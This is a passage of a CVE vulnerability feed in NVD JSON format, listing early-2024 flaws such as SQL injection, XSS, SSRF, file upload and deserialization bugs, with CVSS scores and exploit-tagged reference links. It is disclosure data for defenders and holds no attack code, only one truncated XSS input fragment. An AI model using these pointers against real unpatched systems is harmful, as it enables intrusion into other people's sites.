"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "4.20", "versionEndExcluding" : "5.4.267", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.16", "versionEndExcluding" : "6.1.69", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-17T16:15Z", "lastModifiedDate" : "2024-11-25T10:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0647", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.251373", "name" : "https://vuldb.com/?ctiid.251373", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251373", "name" : "https://vuldb.com/?ctiid.251373", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251373", "name" : "https://vuldb.com/?id.251373", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251373", "name" : "https://vuldb.com/?id.251373", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=KtDjoJlrpAc", "name" : "https://www.youtube.com/watch?v=KtDjoJlrpAc", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://www.youtube.com/watch?v=KtDjoJlrpAc", "name" : "https://www.youtube.com/watch?v=KtDjoJlrpAc", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sparksuite:simplemde:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.11.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-17T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0648", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/FO8AL78oAeTS", "name" : "https://note.zhaoj.in/share/FO8AL78oAeTS", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/FO8AL78oAeTS", "name" : "https://note.zhaoj.in/share/FO8AL78oAeTS", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.251374", "name" : "https://vuldb.com/?ctiid.251374", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251374", "name" : "https://vuldb.com/?ctiid.251374", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251374", "name" : "https://vuldb.com/?id.251374", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251374", "name" : "https://vuldb.com/?id.251374", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Yunyou CMS up to 2.2.6 and classified as critical. This vulnerability affects unknown code of the file /app/index/controller/Common.php. The manipulation of the argument templateFile leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251374 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:yunyou_cms_project:yunyou_cms:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.2.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-17T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0649", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/jC6NMe5TRSys", "name" : "https://note.zhaoj.in/share/jC6NMe5TRSys", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/jC6NMe5TRSys", "name" : "https://note.zhaoj.in/share/jC6NMe5TRSys", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.251375", "name" : "https://vuldb.com/?ctiid.251375", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251375", "name" : "https://vuldb.com/?ctiid.251375", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251375", "name" : "https://vuldb.com/?id.251375", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251375", "name" : "https://vuldb.com/?id.251375", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ZhiHuiYun up to 4.4.13 and classified as critical. This issue affects the function download_network_image of the file /app/Http/Controllers/ImageController.php of the component Search. The manipulation of the argument url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251375." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zhiyun-tech:zhihuiyun:*:*:*:*:*:*:*:*", "versionEndIncluding" : "4.4.13", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-17T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0650", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://torada.notion.site/XSS-at-datatest-php-660aabd1437d4df7a492d19a461a1f3c?pvs=4", "name" : "https://torada.notion.site/XSS-at-datatest-php-660aabd1437d4df7a492d19a461a1f3c?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://torada.notion.site/XSS-at-datatest-php-660aabd1437d4df7a492d19a461a1f3c?pvs=4", "name" : "https://torada.notion.site/XSS-at-datatest-php-660aabd1437d4df7a492d19a461a1f3c?pvs=4", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251376", "name" : "https://vuldb.com/?ctiid.251376", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251376", "name" : "https://vuldb.com/?ctiid.251376", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251376", "name" : "https://vuldb.com/?id.251376", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251376", "name" : "https://vuldb.com/?id.251376", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Project Worlds Visitor Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file dataset.php of the component URL Handler. The manipulation of the argument name with the input \"> leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251376." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:visitor_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-18T00:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0651", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1J3YaxX9RYZ_41-AYdwrCAPMT-YTqILKr/view?usp=sharing", "name" : "https://drive.google.com/file/d/1J3YaxX9RYZ_41-AYdwrCAPMT-YTqILKr/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1J3YaxX9RYZ_41-AYdwrCAPMT-YTqILKr/view?usp=sharing", "name" : "https://drive.google.com/file/d/1J3YaxX9RYZ_41-AYdwrCAPMT-YTqILKr/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251377", "name" : "https://vuldb.com/?ctiid.251377", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251377", "name" : "https://vuldb.com/?ctiid.251377", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251377", "name" : "https://vuldb.com/?id.251377", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251377", "name" : "https://vuldb.com/?id.251377", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file search-visitor.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251377 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:company_visitor_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-18T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0652", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1YHm4WtiYjbxNAd3FKo85qcdHfn1VJYEl/view?usp=sharing", "name" : "https://drive.google.com/file/d/1YHm4WtiYjbxNAd3FKo85qcdHfn1VJYEl/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1YHm4WtiYjbxNAd3FKo85qcdHfn1VJYEl/view?usp=sharing", "name" : "https://drive.google.com/file/d/1YHm4WtiYjbxNAd3FKo85qcdHfn1VJYEl/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251378", "name" : "https://vuldb.com/?ctiid.251378", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251378", "name" : "https://vuldb.com/?ctiid.251378", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251378", "name" : "https://vuldb.com/?id.251378", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251378", "name" : "https://vuldb.com/?id.251378", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file search-visitor.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251378 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:company_visitor_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-18T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0653", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a88330e-fbeb-4ac7-a143-a59766accbeb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a88330e-fbeb-4ac7-a143-a59766accbeb?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a88330e-fbeb-4ac7-a143-a59766accbeb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a88330e-fbeb-4ac7-a143-a59766accbeb?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Custom Field Template plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpgogo:custom_field_template:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-06-11T03:15Z", "lastModifiedDate" : "2025-01-29T18:17Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0654", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/bayuncao/vul-cve-4", "name" : "https://github.com/bayuncao/vul-cve-4", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-4", "name" : "https://github.com/bayuncao/vul-cve-4", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-4/blob/main/picture/1071705290840_.pic_hd.jpg", "name" : "https://github.com/bayuncao/vul-cve-4/blob/main/picture/1071705290840_.pic_hd.jpg", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-4/blob/main/picture/1071705290840_.pic_hd.jpg", "name" : "https://github.com/bayuncao/vul-cve-4/blob/main/picture/1071705290840_.pic_hd.jpg", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.251382", "name" : "https://vuldb.com/?ctiid.251382", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251382", "name" : "https://vuldb.com/?ctiid.251382", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251382", "name" : "https://vuldb.com/?id.251382", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251382", "name" : "https://vuldb.com/?id.251382", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as problematic, was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. Affected is an unknown function of the file mainscripts/Util.py. The manipulation leads to deserialization. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. VDB-251382 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:iperov:deepfacelab:df.wf.288res.384.92.72.22:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-18T01:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0655", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/red0-ZhaoSi/CVE/blob/main/novel-plus/sql/sql_1.md", "name" : "https://github.com/red0-ZhaoSi/CVE/blob/main/novel-plus/sql/sql_1.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/red0-ZhaoSi/CVE/blob/main/novel-plus/sql/sql_1.md", "name" : "https://github.com/red0-ZhaoSi/CVE/blob/main/novel-plus/sql/sql_1.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251383", "name" : "https://vuldb.com/?ctiid.251383", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.251383", "name" : "https://vuldb.com/?ctiid.251383", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251383", "name" : "https://vuldb.com/?id.251383", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.251383", "name" : "https://vuldb.com/?id.251383", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Novel-Plus 4.3.0-RC1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /novel/bookSetting/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251383." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:xxyopen:novel-plus:4.3.0:rc1:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-18T03:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0656", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034934%40password-protected&new=3034934%40password-protected&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/aba36c3b-beae-4c47-8aa8-5012a7a838ce?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Password Protected – Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Captcha Site Key in all versions up to, and including, 2.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpexperts:password_protected:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-27T17:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0657", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033238%40internal-links&new=3033238%40internal-links&sfp_email=&sfph_mail=", "name" : 